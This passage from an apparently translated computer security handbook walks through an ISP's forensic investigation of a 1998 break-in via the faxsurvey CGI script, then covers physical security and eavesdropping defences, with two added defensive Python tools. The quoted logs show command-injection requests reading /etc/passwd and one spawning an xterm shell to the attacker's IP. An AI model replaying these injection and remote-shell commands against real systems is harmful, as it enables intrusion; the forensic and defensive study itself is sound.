tcp 0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED
tcp 0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2
tcp 0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED
tcp 0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED
tcp 0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED
tcp 0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT
tcp 0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp 8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.4778 *.* LISTEN
tcp 0 0 LOCALHOST.VINEYA.domai *.* LISTEN
tcp 0 0 NET10.VINEYARD.N.domai *.* LISTEN
tcp 0 0 SMTP4.VINEYARD.N.domai *.* LISTEN
The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his own remote machine. To test this hypothesis, a quick search was made through the ISP's web server logs:
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] “GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1” 200 79467 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] “GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1” 200 1701 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] “GET /cgi-bin/faxsurvey?id HTTP/1.1” 200 381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] “GET /cgi-bin/faxsurvey?pwd HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] “GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] “GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1” 200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] “GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
Note that lines 1 through 7 occurred within a few seconds of one another. It appears that the attacker used an automated tool that looks for CGI vulnerabilities. In lines 8 through 17, the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool. One reason is that the HTTP protocol version supported by the client changed from "HTTP/1.0" to "HTTP/1.1".
The web server log revealed that the full hostname of the attacker's machine was krldb110-06.splitrock.net. Using the host command, this name can be translated into an actual IP address:
apache: {43} % host krldb110-06.splitrock.net
krldb110-06.splitrock.net has address 209.156.113.121
apache: {44} %
Examining this log, it appears that the /cgi-bin/faxsurvey script has a flaw that allows an attacker to run arbitrary commands (otherwise, why would the attacker keep calling this script and sending URLs with different arguments?). If that is the case, then the following commands must have been executed by the attacker:
ls -lFa
ls -lFa
uname -a
id
cat /etc/passwd
ls -lFa /usr/
id
pwd
/bin/pwd
ls -lFa
ls -lFa ../conf/
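The step above, recovering the commands from the logged query strings, can be automated. The following is an added example, not part of the handbook or the ISP's tooling: it URL-decodes CGI query strings, flags those that read like shell commands rather than form fields, and records which HTTP versions each client used. The sample log is constructed from the entries quoted above plus made-up probe and benign lines, and the matching heuristics are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in Common Log Format. The faxsurvey entries reuse the
# host, times, requests and sizes quoted in the excerpt (trailing referer and
# user-agent fields dropped); the two probe lines and the benign client are
# made up to stand in for the scanner phase and for normal traffic.
SAMPLE = """\
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:10 -0400] "GET /cgi-bin/probe-a HTTP/1.0" 404 170
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:11 -0400] "GET /cgi-bin/probe-b HTTP/1.0" 404 170
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1" 200 1701
client.example.net - - [06/Oct/1998:03:01:00 -0400] "GET /cgi-bin/search?q=ferry&page=2 HTTP/1.0" 200 2210
krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/faxsurvey?pwd HTTP/1.1" 200 305
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1" 200 305
"""

LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
CMD_RE = re.compile(r"^[\w./-]+(\s|$)")   # bare word or path, then end or space
META_RE = re.compile(r"[;|`$<>()]")       # shell metacharacters


def suspicious_query(target):
    """Return the decoded query if it reads like a shell command, else None."""
    path, sep, raw = target.partition("?")
    if not sep or not path.startswith("/cgi-bin/"):
        return None
    query = unquote(raw)
    words = query.split()
    first = words[0] if words else ""
    # Form submissions look like key=value; a bare "id" or "ls -lFa" does not.
    bare_command = "=" not in first and CMD_RE.match(query) is not None
    if bare_command or META_RE.search(query):
        return query
    return None


def summarize(lines):
    """Per client host: HTTP versions seen (in order) and flagged commands."""
    report = defaultdict(lambda: {"protocols": [], "commands": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = report[m["host"]]
        if m["proto"] not in entry["protocols"]:
            entry["protocols"].append(m["proto"])
        cmd = suspicious_query(m["target"])
        if cmd is not None:
            entry["commands"].append((m["ts"], cmd))
    return dict(report)


def tool_change(entry):
    """More than one HTTP version from one host hints at a change of client."""
    return len(entry["protocols"]) > 1


if __name__ == "__main__":
    for host, entry in summarize(SAMPLE.splitlines()).items():
        print(host, entry["protocols"], "tool change:", tool_change(entry))
        for ts, cmd in entry["commands"]:
            print("   ", ts, cmd)
```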
It is not clear from the logs how the attacker got from running these commands to running the xterm command, but it is quite clear that xterm was run, because the HTTP line in the output of the w command, the running xterm process, and the X11 line in the netstat output are all evidence of it.
At this stage the ISP searched the other log files for the attacker's hostname. A suspicious result turned up in the messages log file [47]: apparently the attacker had tried to exploit a flaw in POP or qpopper:
apache: {15} % grep -i krldb110-06 *
messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06.splitrock.net: -ERR POP timeout
To preserve a record of the attacker's processes, they were stopped, an image of their process memory was saved, and then the processes were killed.
Following this, a rule was added to the ISP's routers to block access from the attacker's IP addresses. The permissions on the faxsurvey script were changed to prevent any access to it, so that everything would be ready for an investigation to begin. A few days later the script was removed from the web server altogether.
The victim ISP contacted SplitRock Services, the ISP that was responsible for the attacker's IP address. It turned out that SplitRock provided several modem pools to another ISP under a leasing agreement. SplitRock was asked to preserve its log files so that they could be used in a future investigation.
Using the strings command, it became possible to learn a great deal more about the attacker. One group of strings came from the shell history [48], a list of the commands typed by the attacker. It appeared that the attacker had downloaded a rootkit and had also tried to carry out a buffer overflow attack [49] against the system's IMAP server:
/bin/sh
/bin/sh
/etc/inetd.conf
qpush.c
/usr/bin/gcc
n/gcc
./cc
Expr
Done
/bin/sh
inetd.conf
t) | telnet 127.1 143
cd /etc
cat.s
which pwd
ls –lFa
expr $L + 1
ls –lFa
./cc –10
./cc
The second kind of strings found in the memory images corresponded to shell environment variables. Many of them were variables that would be set for a process spawned by a CGI script, which confirmed that the shell had been run as the result of a CGI attack. The section below confirmed that the CGI script responsible for the intrusion was the faxsurvey script:
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20-
e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint,
*/*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.
113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
SERVER_ADMIN=mvol@vineyard.net
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[
%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\
E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
After the break-in, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that, before the Boston office would open an investigation, the damage had to exceed a threshold of eight thousand dollars. Because the damage had not reached this minimum, no investigation was started. Although the reason for such minimums is understandable, it would be better if things were otherwise, for two main reasons:
• Many attacks are carried out by relatively young attackers who might stop such activities on receiving a warning or, at most, a suspended sentence. The absence of formal investigation and follow-up merely encourages these attackers to move on to bigger and bigger crimes until they are responsible for serious damage.
• It is possible that the attacker is highly skilled and is involved in other illegal activities that usually go unnoticed. There are many cases in which investigations of small crimes have led law enforcement to major financial crimes. For example, a 75-cent accounting discrepancy led Cliff Stoll [50] to track down a computer intruder who, it eventually emerged, had been breaking into U.S. commercial and military computers at the behest of the Soviet Union. (The details of this story appear in Stoll's classic hacker [51] thriller, "The Cuckoo's Egg" [52].)
When the matter became clear, it emerged that the vulnerability in the faxsurvey script had been reported on the BugTraq mailing list about three months before the attack. Either no one on the ISP's staff had read the BugTraq messages, or no one knew that the faxsurvey script was installed on the system:
Hi!
There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any
command s/he wants with the permissions of the HTTP-Server.
Password-File.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package
installed are vulnerable to this attack.
I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <bs@suse.de>
told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just
remove the script from the file list.
After the attack, the ISP carried out the following cleanup:
• An immediate backup of all disks was made. This backup was kept as evidence in case damage was discovered that needed to be pursued.
• The system was scanned for files with new permissions. None were found.
• The permissions on the /usr/include directory and on the C compiler were changed so that only staff members could access these files and compile new programs.
• Key programs were compared with the original distribution on CD-ROM to detect any changes. They had not been modified.
• All log files were examined by hand for additional suspicious activity. None was found.
• After one week, the router rule that blocked access to SplitRock was removed.
ﻓﺼﻞ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﻛﻠﻴﺎﺕ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ" ﻫﻤﺔ ﻛﺎﺭﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗﺎﻳﭗ ﻓﺮﺍﻣﻴﻦ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؛ ﻣﺜﻞ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄـﺮ ،ﻗﻔـﻞ
ﻛﺮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﻣﻨﺒﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧﻪ ،ﺍﺗﺎﻗﻚ ﻗﻔﻞﺷﺪﻩ ﻭ ﻣﺠﻬﺰ ﺑﻪ ﺩﻭﺭﺑﻴﻦ ﻣﺪﺍﺭﺑﺴﺘﺔ ﺭﺍﻳﺎﻧﻪ ،ﻭ ﻣﻘﺴﻢﻫﺎﻱ ﺑﺮﻕ ﻭ ﻣﻨﺒﻊ ﺑﺮﻕ ﻭﻗﻔﻪﻧﺎﭘـﺬﻳﺮ
) .٥٣(UPSﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺳﺖ ﻏﺎﻟﺒﹰﺎ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ ،ﺍﺯ ﺟﻤﻠﻪ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ ،ﺧﺮﺍﺑﻜﺎﺭﻱ ﻭ ﺳﺮﻗﺖ؛ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﺮﺍﻱ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ
ﻣﻲﻛﻨﺪ.
People First
It goes without saying that in emergencies and disasters, the lives and safety of personnel must always take precedence over data or equipment. Although there may be a very few exceptions to this principle (for example, in sensitive military situations), you should never lose sight of what is truly irreplaceable.
… leaves its entrance open. A magazine in San Francisco had more than one hundred thousand dollars' worth of its computers stolen over a holiday, because an employee had used his electronic key card to open the building door and disable the alarm system. After entering the building, this person had gone to the utility room, where the alarm system is located, and had also pulled the printed log out of the alarm system's printer and destroyed it.
Other organizations assume that dealing properly with physical security is too complicated or too difficult. Few organizations are able to protect their servers from nuclear attack, major earthquakes, or terrorist bombings; but we must never let these catastrophic cases serve as a pretext that keeps the organization from planning carefully for adverse events.
The issues that physical security covers (threats, practices, and protections) are in practice different for different sites or organizations. Because every site differs from every other, this chapter cannot offer a set of specific recommendations; it can only offer a starting point, a list of issues to consider, and a suggested procedure for formulating an actual plan.
Other Contingencies
In addition to the items already mentioned, you may want to consider the effect of the following on your operations:
Fire
Computers usually survive fire very poorly. If you want your computer to be an exception to this rule, make sure there is good fire-fighting equipment near the site and that staff are trained to use it properly. Automatic gas discharge systems and sprinkler systems each have advantages and disadvantages that must be considered carefully.
Make sure that the wiring is protected as well as the computers. Make sure that smoke detectors and sprinkler heads, if used, are installed so that they also cover the wires in cable trays (often above suspended ceilings) and in cable ducts.
Smoke
Smoke is very damaging to computer equipment. Smoke is a potent abrasive and collects on the heads of unsealed magnetic disks, optical disks, and tape drives. Sometimes smoke is generated by the computers themselves. Electrical fires, particularly those caused by the transformers in video monitors, can produce pungent, acrid smoke that may damage other equipment and may also be poisonous or carcinogenic. Another significant danger is the smoke that comes from cigarettes and pipes.
Install smoke detectors [55] in every room that contains computer equipment, and make sure that they are also present under raised floors and above suspended ceilings. Do not allow anyone to smoke in your computer room.
Earthquake
Nearly every part of the planet experiences occasional tremors. Some buildings collapse in an earthquake, and many remain standing. Careful attention to the placement of shelves and bookcases in your office can increase the chance that you and your computer will survive even the most severe events.
Avoid placing computers on high surfaces or near windows, and avoid putting heavy objects on shelves near computers. Computers can be placed under sturdy tables or attached to the surface they sit on. You can use bolts, tie-downs, or other means to do this. (Doing so also helps to deter theft.)
Electrical Noise
Motors, fans, heavy equipment, and even other computers generate electrical noise that can cause intermittent problems for the computer you are using. This noise can be transmitted through the air or through nearby power lines.
Electrical surges are a special kind of electrical noise consisting of one or more high-voltage pulses. If possible, each computer should have its own separate electrical circuit and ground wire, with an isolated power filter. Under no circumstances should a computer share a circuit with heavy electrical equipment. Radio transmitters (including mobile phones) should be kept away from computers.
Lightning
Lightning generates large power surges that can damage even computers with electrical protection devices. If lightning strikes your building's metal frame (or hits its lightning rod), the resulting current can generate a strong magnetic field on its way to ground. Computers should be unplugged during lightning storms; if that is not possible, use surge suppressors. Although these devices will not protect the machine against a direct strike, they help when storms are distant. Magnetic media should be kept as far as possible from the building's metal structure. Never run copper network cable outside the building unless it is inside metal conduit.
Water
Water can destroy your computer. The primary danger is an electrical short circuit, which occurs when water bridges a voltage-carrying trace and a ground trace on a circuit board.
Water usually comes from rain or flooding, and sometimes from a sprinkler system that gets out of control. Water may also come from odd places, such as an overflowing toilet on a higher floor, vandalism, or the fire department.
Move computers out of basements that are prone to flooding. Install water sensors on the floor of the level that houses the computer rooms and also beneath raised floors, and use them to cut power automatically in the event of a flood.
Food and Drink
Food, especially greasy food, sticks to people's fingers and from there is transferred to whatever they touch. Often this includes dirt-sensitive surfaces such as magnetic tapes and optical disks. One of the fastest ways to put a desktop keyboard out of action is to pour a soft drink or a cup of coffee over its keys.
In general, the simplest rule is also the safest: keep all food and drink away from your computer systems. [56]
… use them. Backups should also be stored in blast-proof containers or off-site.
• Insects: take effective measures to limit the number of insects in your computer room.
• Vibration: in a high-vibration environment, place computers on a rubber or soft mat, making sure that the ventilation openings are not blocked.
• Humidity: monitor the ambient humidity and keep it at an appropriate level.
Environmental Monitoring
To detect unexpected problems, continuously monitor and record the temperature and relative humidity of your computer room. As a general rule, every 1,000 square feet of office space should have its own recording equipment. Review and report on what you have recorded at regular intervals.
56 Of all the rules in this chapter, this is perhaps the most important one, and it is also the one most often broken.
If the air ducts that serve your computer room are large enough, intruders can use them to gain entry to an otherwise secure area. Areas that need large amounts of ventilation should be served by several small ducts, or by one large duct with screens welded over the air vents or inside the ducts. In a very high-security environment, motion detectors can also be used inside the ducts.
Glass Walls
Although glass walls and large windows are usually used for architectural effect, they can be serious security risks. Glass walls are easily broken; a brick with a bottle of gasoline thrown at a window can cause considerable damage. An attacker can also obtain vital information, such as passwords or details of how the system operates, simply by watching the people on the other side of a glass wall or window. It may even be possible to recover information from behind a frosted pane by analyzing the light reflected from it. Interior glass walls are good for rooms that must be guarded but that the guard is not allowed to enter; in all other cases you should avoid them.
Network Cables
In many cases a vandal can disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared with Ethernet, fiber-optic cables are more vulnerable (they are more easily damaged), harder to repair (they are difficult to splice), and more attractive targets (they usually carry more information).
"Temporary" cable runs in a facility usually end up being used permanently, so spend the extra time and effort to install the cable properly in the first place. A simple way to protect a network cable is to run it through physically secure locations. For example, Ethernet can be run through steel conduit. Besides protecting against vandalism, this approach also protects against some kinds of network eavesdropping, and it may help your cables survive a small fire. If someone steps on a fiber-optic cable, small fractures may form in it. A fracture of this kind is hard to locate because it leaves no mark on the cable jacket.
Some high-security installations use double-walled, shielded conduit with pressurized gas between the layers. If the pressure between the walls drops, the conduit's pressure sensors stop the traffic on the lines or sound an alarm. This happens, for example, when someone breaches the conduit walls.
Network Connectors
In addition to cutting a cable, an attacker with access to a network terminator, or a network connector, can knock out the system's power or damage the network. All wired networks are vulnerable to high-voltage attacks.
Utility Connections
In many buildings, the electricity, gas, and water can easily be cut off, sometimes even from outside the building. Because computers need electrical power, and because temperature control systems may depend on gas heating or water cooling, these connections give vandals additional points of attack.
Because it is impossible to defend against many attacks, consider a system of hot backups and mirrored disks and servers. With a reasonably fast network link, you can arrange for files stored on one computer to be copied simultaneously to another system on the other side of town or the other side of the world. Sites that cannot have simultaneous backup can take hourly or nightly incremental dumps. A suicide bombing may destroy your computer center, but your data can be kept safe somewhere else.
Preventing Theft
Having a computer stolen, especially a laptop, can be a distressing experience; but if the computer holds irreplaceable or extremely sensitive information, it can also be very costly for the victim.
Many computer systems are stolen for resale, either as complete systems or, if the thieves are sophisticated, as individual components, which are harder to trace. Some computers are stolen by people who cannot afford to buy one for themselves. Others are stolen for the information stored on them, usually by people who want to obtain that information, but sometimes by people who want to deprive the owner of its use. Whatever the reason a computer is stolen, most computer thefts have one element in common: opportunity. In many cases, computers were stolen because they had been left unprotected.
Laptops and other portable computers present risks of their own. They are easily stolen, difficult to tie down (they would no longer be portable otherwise!), and easily resold. People who use laptops should be trained to be very careful in protecting them. Theft of these computers, particularly in airports, is reported to be a major problem at present. Laptops should never be left unattended anywhere, for any length of time. If you are traveling by taxi, keep your laptop with you rather than in the trunk.
Fortunately, a small number of simple, inexpensive measures can greatly reduce the risk of laptop or desktop theft.
Locks
One good way to protect a computer from theft is to secure it physically. A variety of physical tie-down devices are available for fastening computers to desks and cabinets. Although these devices cannot prevent theft, they make it more difficult.
Portability is an important selling point of laptops, and also the main reason they are stolen. One of the best ways to reduce the chance of your laptop being stolen is to lock it, at least temporarily, to a desk, a pipe, or some other large object.
Most laptops sold today are equipped with a security slot. For less than $50 you can buy a cable lock that attaches to the laptop's security slot and locks it to a nearby object. Once the machine is locked, it cannot be released without the key or without damaging the machine, and a damaged computer is very hard to resell. Locks of this kind mainly prevent laptops from being snatched by street thieves.
Tagging
Another way to reduce the chance of theft and increase the likelihood that a laptop will be returned is to engrave your name and telephone number on it, or to tag it with permanent or semi-permanent tags. Such tags make it very hard for buyers or sellers to claim they did not know the computer was stolen.
The tags of a good tagging system are clearly visible and carry a unique serial number, so that the organization can track its property. One low-cost tagging system is produced by the company Security Tracking of Office Property (STOP) [58]. These tags are assigned a unique serial number and come with three years of support in Europe, Australia, Latin America, and North America. If a piece of equipment bearing a STOP tag is found, the company can arrange for it to be returned to its rightful owner.
Component Theft
When RAM prices were high, businesses and universities suffered from repeated RAM thefts. Many computer companies and universities have also seen large thefts of advanced processors. RAM and the latest processors are easily sold on the open market. These processors are untraceable, and when thieves take only part of the RAM inside a computer, weeks or months may pass before the theft is noticed. If a user complains that a computer is suddenly running much more slowly than it did the day before, check its RAM, and then check whether its case is physically secured.
Encryption
If your computer is stolen, the information on it will be at the disposal of its new owners. They may erase the information, or they may read it. Sensitive information may be sold, used in defamatory mailings, or used to compromise other computers.
Nothing can ever be made completely theft-proof, but stolen information can be rendered virtually useless: it is enough that the machine be encrypted and that the thief not know the encryption key. For this reason, even with the best computer security mechanisms and physical deterrents, sensitive information should be encrypted with an encryption system that is difficult to break. We recommend using a strong encryption system, so that even if your computer is stolen, the sensitive information on it cannot easily be misused.
Protecting Your Data
There is considerable overlap between the physical security of your computer systems and the confidentiality, integrity, and correctness of your data. After all, if someone steals your computer, they naturally have its data as well. Unfortunately, your data is exposed to a variety of attacks that can defeat the physical measures described in the preceding sections.
Eavesdropping
Electronic eavesdropping is perhaps one of the most sinister kinds of unauthorized data disclosure. Even with the most ordinary equipment, an eavesdropper can make a complete transcript of a victim's actions: every keystroke, and every piece of information shown on the screen or sent to the printer. Meanwhile the victim is usually unaware of the attacker's presence and goes on working unsuspectingly, exposing not only sensitive information but also the passwords and procedures needed to obtain still more.
Tools exist for eavesdropping at many points around a computer: the connection between the keyboard and the computer, data cables and wiring, Ethernet and fiber-optic networks, wireless networks, and even the radio emissions of the equipment. There are several ways to make eavesdropping more difficult:
• Routinely inspect data cables and wires for physical damage or tampering, and consider using shielded or armored cable to make it harder to tap the wires. If you are very security-conscious, run the cables in steel conduit.
• Make sure that unused offices have no live Ethernet ports. Use Ethernet switches instead of Ethernet hubs. Use LAN monitoring software such as arpwatch, which detects packets with previously unseen MAC [59] addresses, or use switches that can filter packets by MAC address. Wherever possible, use fiber-optic cable instead of copper, because it is harder to tap covertly.
• Avoid using wireless networks. If you must build a wireless network, enable every available security feature for defense in depth (such as encryption, firewalls [60], disabling SSID [61] broadcasts, MAC filters, and so on). Because most of these features provide very little security, train users always to use a VPN or another encrypted tunnel on the wireless network. Place the wireless access point [62] outside the firewall (or between two firewalls).
• Encryption provides significant protection against eavesdropping. Therefore, always assume that your communications are being monitored, and treat encryption of all communications as a requirement. When that is not possible, at least encrypt all sensitive network traffic (such as usernames and passwords for remote services).
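The check that the list above attributes to LAN monitoring software such as arpwatch (noticing MAC addresses with no previous history) can be sketched as follows. This is an added example, not arpwatch's code and not part of the original handbook; the `StationMonitor` class, the alert names, and all addresses are constructed for illustration.

```python
"""Flag new or changed MAC addresses seen on a LAN segment.

Sketch of the kind of check a monitor such as arpwatch performs; this is
not arpwatch's code. Observations are (timestamp, ip, mac) tuples such as
could be collected from ARP traffic. All addresses below are constructed.
"""
from collections import namedtuple

Alert = namedtuple("Alert", "timestamp kind ip mac previous")


def normalize_mac(mac):
    """Return a MAC address as six lowercase, zero-padded hex octets."""
    parts = mac.strip().replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError("not a MAC address: %r" % (mac,))
    octets = [int(part, 16) for part in parts]   # ValueError on non-hex
    if any(not 0 <= octet <= 0xFF for octet in octets):
        raise ValueError("octet out of range in %r" % (mac,))
    return ":".join("%02x" % octet for octet in octets)


class StationMonitor:
    """Remember which MAC answers for each IP and report surprises."""

    def __init__(self, baseline):
        # baseline: {ip: mac} taken from the site's equipment inventory
        self.current = {ip: normalize_mac(mac) for ip, mac in baseline.items()}
        self.history = {ip: {mac} for ip, mac in self.current.items()}

    def observe(self, timestamp, ip, mac):
        """Record one observation; return an Alert, or None if unremarkable."""
        mac = normalize_mac(mac)
        previous = self.current.get(ip)
        seen = self.history.setdefault(ip, set())
        if previous is None:
            kind = "new-station"      # no history at all for this IP
        elif previous == mac:
            kind = None               # same station as before
        elif mac in seen:
            kind = "flip-flop"        # IP went back to an earlier MAC
        else:
            kind = "changed-mac"      # IP now answered by an unseen MAC
        seen.add(mac)
        self.current[ip] = mac
        return Alert(timestamp, kind, ip, mac, previous) if kind else None


def scan(observations, baseline):
    """Run every observation through a monitor and collect the alerts."""
    monitor = StationMonitor(baseline)
    alerts = []
    for timestamp, ip, mac in observations:
        alert = monitor.observe(timestamp, ip, mac)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed inventory and observations (documentation IP range,
# locally administered MAC addresses).
BASELINE = {
    "192.0.2.10": "02:00:00:aa:00:01",
    "192.0.2.11": "02:00:00:aa:00:02",
}
SAMPLE_OBSERVATIONS = [
    ("2005-07-01T09:00:00", "192.0.2.10", "02:00:00:aa:00:01"),
    ("2005-07-01T09:05:00", "192.0.2.11", "02-00-00-AA-00-02"),
    ("2005-07-01T21:14:00", "192.0.2.57", "02:00:00:bb:00:99"),  # unused office port
    ("2005-07-01T21:20:00", "192.0.2.10", "02:00:00:bb:00:99"),  # same MAC, other IP
    ("2005-07-01T21:21:00", "192.0.2.10", "02:00:00:aa:00:01"),
    ("2005-07-01T21:22:00", "192.0.2.10", "02:00:00:aa:00:01"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_OBSERVATIONS, BASELINE):
        print(alert.timestamp, alert.kind, alert.ip, alert.mac,
              "(was %s)" % alert.previous)
```

An alert of this kind says only that the address picture changed; a replaced network card produces the same signal, so each alert still has to be checked against the inventory.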
Protecting Backups
